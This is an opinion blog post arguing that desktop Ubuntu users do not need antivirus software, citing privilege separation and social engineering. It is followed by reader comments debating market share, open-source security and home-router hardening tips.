Does Ubuntu need antivirus?

This is a very common question that comes up on the Ubuntu Forums from new users migrating from Windows. The answer, of course, is “No, Ubuntu doesn’t need antivirus.” Linux (and sometimes Mac) users often get accused of being smug or complacent for saying they don’t need antivirus, so I think I have to clarify that answer for the skeptics.

What kind of virus are you looking for protection from?
I’m not an expert on all the terminology out there for malware, but there are basically two kinds of malware, when it comes to security—malware that self-replicates and infects through security holes and malware that tricks the user into installing it (what’s called social engineering).

What makes the first kind of malware such a problem in Windows (at least in XP—I’ve never tried Vista) is the default-to-administrator-account setup, which is reinforced by some programs designed for Windows requiring the user be administrator, documentation for Windows assuming you are administrator (very seldom have I seen instructions for installing a setup.exe ask you to right-click, select Run as… and authenticate with an administrator account, with the assumption that you must be using a limited user account regularly), and the inconvenience of not being an administrator all the time (Run as… is not perfect and is often difficult to use).

The administrator account in Windows has access to almost everything on the system, so if it gets compromised, the entire system is compromised. And if you’ve ever had to clean malware off a Windows computer, you know how difficult it is to get all the junk out of the registry and all the reappearing programs and .dll files out of system directories.

A limited user account, on the other hand, has access only to its own account and very few system directories. I don’t know of any Windows malware that targets limited user accounts, but if the limited user account got compromised, cleaning up the malware would be a lot easier, as you could create another account, and one by one quarantine and examine user files you copy over from the compromised account to the newly created account and then delete the compromised account.

In Ubuntu (and in most Linux distributions and Mac OS X), the default account operates mainly as a limited user account, with write access to mainly its own user directory, and then the user in the admin group (in the case of Ubuntu and Mac OS X) is able to “sudo” and temporarily escalate privileges for particular tasks after password authentication. On non-Ubuntu Linux distributions, the authentication is a temporary login to the root (total access) account.

While a lot of people make the case that separating user privilege from system privilege alone guards against malware infestation (and they probably have a point), I’d at least argue that that separation makes cleanup after an infection a lot easier. The only trustworthy cleanup I know of a Windows-compromised computer is a complete reinstallation of the operating system.

But then there is social engineering. This could be anything from a tainted email attachment a friend innocently sends you and you open to a website asking you to download a “codec” (disguised malware) to play a video. The point is that the flaw isn’t the operating system itself but you, the user. If you’re tricked into installing a piece of malware, it won’t matter what kind of security you have set up. Don’t listen to Linux users who will tell you that you have to first make a file executable and then run it. With all the “user-friendly” graphical tools now available, all someone has to do is create a malicious “cool” .deb file for Ubuntu and trick Ubuntu users into downloading it, double-clicking it, and authenticating with their password. That .deb can run any command then with root privileges and compromise your entire system. It could install a keylogger or a rootkit.

Another time you shouldn’t listen to Linux users is when they try to say a lack of malware on Linux has nothing to do with marketshare, since Linux dominates the server scene, and Linux servers are not more compromised by malware than Windows servers. While what they’re saying is true, it’s also misleading. Most corporate servers are run by trained professionals or at least knowledgeable amateurs, and they’re less likely than the general populace to fall for a phishing scam or other kind of social engineering attack. This is not, true, however, for home users. Nevertheless, the point is moot. If security by minority has any validity, I think you can rest pretty easy that within the next three years, Ubuntu won’t reach over 50% of home user marketshare, no matter how successful it is or how many “years of the Linux desktop” pass by.

But don’t Linux viruses exist?
Yes, but they are either proof-of-concept ones created for research purposes or ones that took advantage of flaws that have since been patched. There aren’t any Linux viruses that are actual threats to Linux systems. If malware relies on social engineering, though, and you’re tricked into installing it, then your system is screwed either way—running an antivirus program won’t help you.

Should you run antivirus just in case?
Well, obviously I can’t stop you. You can also wear a gas mask around all the time when walking through perfectly healthy air. I won’t stop you from doing that either. But in either case, I’m not going to pretend what you’re doing makes sense.

Most antivirus applications in Linux scan for Windows viruses, and if a Linux virus came into existence and actually was a threat, it wouldn’t automatically be in your antivirus application’s definitions anyway, since the virus is new. So you wouldn’t be protected. A vaccine against polio isn’t going to protect you from getting AIDS. Neither is an outdated set of virus definitions going to protect you against a new threat.

Shouldn’t we protect Windows users?
Some have made the case that it is our responsibility to protect our Windows-using friends and relatives by scanning files before they’re sent to Windows users. While that case could be made, I don’t think Linux home users make up a large enough demographic to protect Windows users in such a way. It’s about as effective as building a wall around a city for protection but having the wall go less than 1/10 way around the city. Great. The attackers will just go to a different entrance to attack the city. (See the first link in the Further Reading section for more details.)

This brings up a good point, though. If you’re using Ubuntu as a regular desktop or laptop computer, you don’t need to run antivirus, but if you’re using Ubuntu as a mail server, you probably should install and use antivirus. In fact, many mail servers are Linux-based, so you would be part of a very large wall—an actual first line of defense.

What good is antivirus?
I do have to say, though, I think antivirus is mainly a resource hog and almost a placebo. It’s something that makes people think they’re secure without actually making them secure. In fact, every time I’ve seen a Windows-using family member or friend get infected with malware, that person has always been running antivirus, antispyware, etc. You can’t rely on a program to protect you. You have to learn good security practices yourself—don’t run as administrator regularly, use strong passwords, learn to recognize social engineering and phishing scams, do not visit sketchy websites, etc. Relying on anti* programs for protection is like thinking the vaccinations you get from the doctor protect you against all disease in life. You can’t then just have unprotected promiscuous sex, never wash your hands, eat anything you find in the forest, and have extensive physical contact with sick people, and then expect to stay healthy.

Antiviruses operate in two ways, and ultimately neither way ends up being effective for home use. One way is maintaining a list of known viruses. Well, when a new virus shows up, it won’t be in that list before it’s done some serious damage. The other way is trying to identify malware based on the content of the file. This leads to a lot of false positives and essentially defeats the point of antivirus, since it ends up being the user deciding what files are trustworthy or not… or just getting used to overriding the false positive identification of the antivirus application to the point that it’s like whitelisting everything. I would actually argue that you don’t need antivirus in Windows either. I know that sounds brash, but I believe it’s true. If you want Windows to be secure, use a limited user account, show file extensions for all files, use Thunderbird instead of Outlook, learn how to identify and avoid social engineering, and use strong passwords.

Conclusion
Frankly, I’ve never seen a real epidemic threat to Ubuntu users, but if one appeared, I promise you that having antivirus installed would not protect you from it. Saying you don’t need antivirus in Ubuntu is not complacency—it’s common sense. Learn about real security good practices and stop clinging to the antivirus placebo.

Further Reading
A succinct sum-up of this rather long-winded blog post you’re reading
A short write-up on Ubuntu security
A more in-depth write-up on Ubuntu security

18 comments

  1. I think there is one type of antivirus effective for windows: the “Scan this file and that’s it” kind. I use AVG, and dual boot Vista/Ubuntu, and I’ve gotta say, I never run full-system scans. By the time one of those picks up something, it’s probably too late. I do, however, run an individual file scan on anything I download (other than like a .txt to do list or something) just in case. That, I think, is good as an extra line of protection, and a first line of defense against even social engineering attacks. It won’t stop everything, but for the ones that would have gotten through on my stupidity, it at least provides some cover.

  2. We are running Ubuntu 8.04 and have Clam AV installed. It is easy to install, as it is in the “add/remove” repositories as “Virus Scanner”.

    The designer of the Linux GUI for Clam AV, known as Clam Tk, says this in his FAQs about whether you need it or not http://clamtk.sourceforge.net/faq.html :

    Q: “I thought Linux doesn’t NEED antivirus protection!”

    A: “You probably do not need it. But if you feel more comfortable using it, great.”

    We avoid all the viruses distributed out there on the net by doing just as you have described here in your article. Actually we use webmail instead of Thunderbird, which gives even more security as everything gets scanned before we even read it plus all downloads are scanned too.

    However we also update Clam AV regularly and run it from the command line to do a whole system scan now and then. It doesn’t hurt to do this and it certainly doesn’t lull us into a false sense of security. Some times we use Clam Tk to scan a suspicious single file, just to see if it is something we don’t want to forward onto a Windows user. Anything that we might have come up positive we would upload to Jotti’s malware scanner at http://virusscan.jotti.org/ for 20 extra “second opinions”.

    In running Clam AV on our Ubuntu systems we have never found any viruses, but have had several “false alarm files”. These are benign, often system files, that Clam AV has mistaken for viruses. We always submit these to the Clam open source dev team through http://cgi.clamav.net/sendvirus.cgi and thus can feel that we are contributing in a small way to helping make the only open source free software anti-virus project better and more competitive with its commercial competitors. It takes little time and costs us nothing to do the scans and submit the odd false alarm report.

  3. I agree 99.99% with the writer of this article. Although he states that your shouldn’t run from the admin account all of the time, i do anyway because i like having access to windows files. But social engineering is the only reason un-computer savy people get viruses, because they do not know what they are doing. But i have seen people get viruses that have infected their pc, and they did have full running VP. And the only way, like the writer stated, to safetly get it off was to reload the OS. Oh yea, Ubuntu rocks.

  4. I don’t believe that the author of the article is smug – just a little naive.
    He states that installing malware would be difficult because of the way Linux is setup into two different types of accounts. The administrator has the right to install programs and modify settings, the user just uses the system and the software. What makes this statement naïve is the idea that this “wall” will not be surmounted. At this time, Linux has according to Wikipedia a market share of just 2% in the overall Desktop OS Segment. These numbers alone make Linux uninteresting to the criminal hacker, who has a bigger target in Window’s 90%. But what if the goal of the Linux community to surpass Windows is reached? Than the interest would be peaked because now hackers have a bigger target. Having access to the entire source code of Linux – Kernel and Applications – makes it even easier to infiltrate a system considered save.

  5. Well,
    I think the writer of the article has busted all doubts regarding the very famous topic “Virus Protection for Linux”.
    As I often come across people arguing with me on the topic, I can simply redirect them on this article.
    I am absolutely with the writer and believe that nothing can actually stop viruses entering Windows Systems. Whereas Linux, because of its internal architecture is much much more secure than Windows.
    Also, there is no cure of “Social Engineering”.
    Being secure is an art, not science.

  6. Everything its right for everyone, everyone can expose their opinion because it is free, but meikel14 its right. Because how nobody’s perfect – like that – nothing’s perfect.

  7. Just don’t use a proprietary bundle of software called windows. Use something based off unix, or unix like. The security models are superior to Windows design of an open system that just got crappy locks. The User is always at fault – the number one reason of computer issues.

  8. I would agree to what the writer documented in this article. Yeah. The only way to secure Windows system is to use Firewall and use non-Microsoft Products, Like FireFox, thunderbird. Still, I love saying this. “UBUNTU ROCKS”

  9. Linux in general rocks. I remember when I first installed Ubuntu I went to http://www.grc.com/x/ne.dll?rh1dkyd2 to test how secure the distro was, And was amazed to see every port was register as “stealth”. In comparison with Vista, half the ports where either “open” or “close”. But I agree with what the author mention, Is basically up the user that determines the security of his OS.

  10. meikel14 is absolutely right. It is foolish to think that Linux would always be the safest route. While I agree that it is now, and am very impressed by its open-source philosophy, it is true that the free source code would prove to be a spectacular tool for the malicious user. However, I still find it unlikely that Linux will ever get quite that popular, so for now I’m comfortable sitting here with my safe OS.

  11. It is foolish to think Linux will always be the safest route. Good thing I never said that.

    The post, if you read it, is about whether you should run antivirus or not.

    And the bottom line is that whether there are real security threats or not, running antivirus does not protect you. Antivirus is useless.

    As for source code availability making it easier for malicious folks to compromise a system, that sounds right in theory, but in practice, we know this not to be true. If it were true, closed source operating systems and applications would almost never be compromised… and they almost always are.

  12. Antivirus is not the “locks on the doors”; it’s the alarm system that *might* go off after you’ve already been compromised…

    A malicious user may have access to Linux source code, but he will NOT have the ability to inject malware into future Linux releases to be exploited.

    And should anyone be worried that a malicious user has the ability to scan the source code looking for vulnerabilities? No… Millions of other eyeballs have preceded him doing the very same thing — and removing the vulnerabilities as they find them.

    This sort of scrutiny & vetting does NOT happen with closed-source operating systems. (When’s the last time you successfully submitted a bug report to Microsoft for “leaving the doors open” in Windows?)

  13. Those advocating the theory that Linux is only more secure because of it’s low market share (Peter, meikel14) should do some more research. Simply not true.
    The Unix security model *does* make a huge difference as compared to Windows. As the author says, nothing will make people safe if they behave stupidly and install recklessly, but at least Linux *allows* a user to behave safely.
    Security by obscurity does not work! Source code makes a system much more secure. The black box DLL model that Windows runs under for profiteering reasons is also bad engineering for security and performance. Local compiles are a better way.(But then source code gets distributed…not good for profits!)

  14. Yeah!
    Anti-virus software is just a defense display software to delete virus program. Whether OS or Linux should used or not!
    According to Meikel14,yeah, may be he’s right. ‘Cause hacker break only the system OS which most user accessed.They produce hacking code for most popular Operation System. That’s why people say Windows is not secure than Linux, the answer is Windows has users’ beliefs more than Linux’ OS. So,as for now condition, Linux doesn’t need Anti-virus software immediately. Meaning not needing for now.
    May be for next several of years when users think Linux is more secure than Windows, and Hackers think most people they try to hack is using Linux than Windows, they will also produce new virus program to attack and then Linux OS will also need more useful anti-virus programs just like Windows need as now.
    Good OS will ever follow by hackers…

  15. Hullo there, was perusing your tutorial a few moments ago–particularly the portion on security. I’m relatively new to Linux systems all in all, but I’ve been working with Windows since all I had was Tandy 1000 that ran on DOS (thinking back my floppy drive and copies of Hangman on them seemed pretty spiffy back then). Not necessarily relevant to the following, just a bit of an introduction.

    What I actually wanted to comment on was a few simple steps that anyone can use to beef up security on their computer (running any OS). I’ll outline them in a few points.

    User accounts. As much as you can do your work from an account without administrative privileges. This can help you save yourself from accidentally downloading a file which may contain software that self-loads/installs. It may also allow you to remove anything remotely from the infected account without causing harm to critical software segments.

    Downloads. You went into this a bit. I concur, you should never click links inside emails. One can take this a bit further. Regardless of your OS, know which file extensions indicate programs or script files. If you have any doubts about a file extension, Google doesn’t.

    Internet and routers. It is amazing how many layers of security you can add to your network, especially if you use a wireless connection. It is no secret that wireless signals can be found easily, but they have encryption protocols for a reason. Use them. For instance, if you use LinkSys, your router’s domain is http://192.168.1.1 go there if you never have. If you’ve never been there your account/password will be admin/admin or just the password admin with no account name. Regardless of your router make it will be some combination of this by default. If you can’t figure how to access it, Google can. Once you get there change your router to use a secure network (which means it requires a password to log on to it). Avoid WEP if at all possible, it is antiquated and YouTube can show you how to it hack it in all of 5 minutes. Your best option is WPA or WPA2. Another layer of security you can add is pretty simple. Determine the MAC address (sometimes called the “physical address”) of every computer you want to use your internet. It will be a 12 digit number in hexadecimal format (should look something like this–00:2B:89:94:EC:43–not mine by the way, just a number I made up). After you know what this is for each computer on your network, return to your router’s domain and modify the settings so that your router only authenticates access attempts from devices with those addresses (this helps because each MAC address is unique to each networking device/card and is assigned at the factory at which it is made). Lastly, change your router’s access password (the one for the router’s domain, not your internet) from the default setting. If you don’t any jerk with a laptop (within range of the device) can access the website and modify your settings to his liking or worse lock you out of your own network. Just by doing these simple tasks you will have added 3 layers of extra protection.

    The best thing to keep in mind is that nothing can make you 100% squeaky-clean and safe. There will always be people out there trying to do things to screw other people over. Just use common sense. I spared quite a bit of detail, but with a little how-know and a devil-may-care attitude you can do all these things. Plus, always always remember Google can teach you how to do anything. Except build a quantum particle accelerator and travel time. Or can it?

  16. >>”Well, obviously I can’t stop you. You can also wear a gas mask around all the time when walking through perfectly healthy air. I won’t stop you from doing that either. But in either case, I’m not going to pretend what you’re doing makes sense.”<<

    That is probably the best analogy I have ever read describing that issue!

    I have only recently begun running Ubuntu 11.04 and I honestly feel like jumping in a pool of disinfectant every time I have to use Windows on public PCs.

    How did such piss-poor, filthy, slow and futile software become so widespread?

    People just need to know that there is a better alternative to Windows I guess…

Leave a Reply to Peter Cancel reply

Your email address will not be published. Required fields are marked *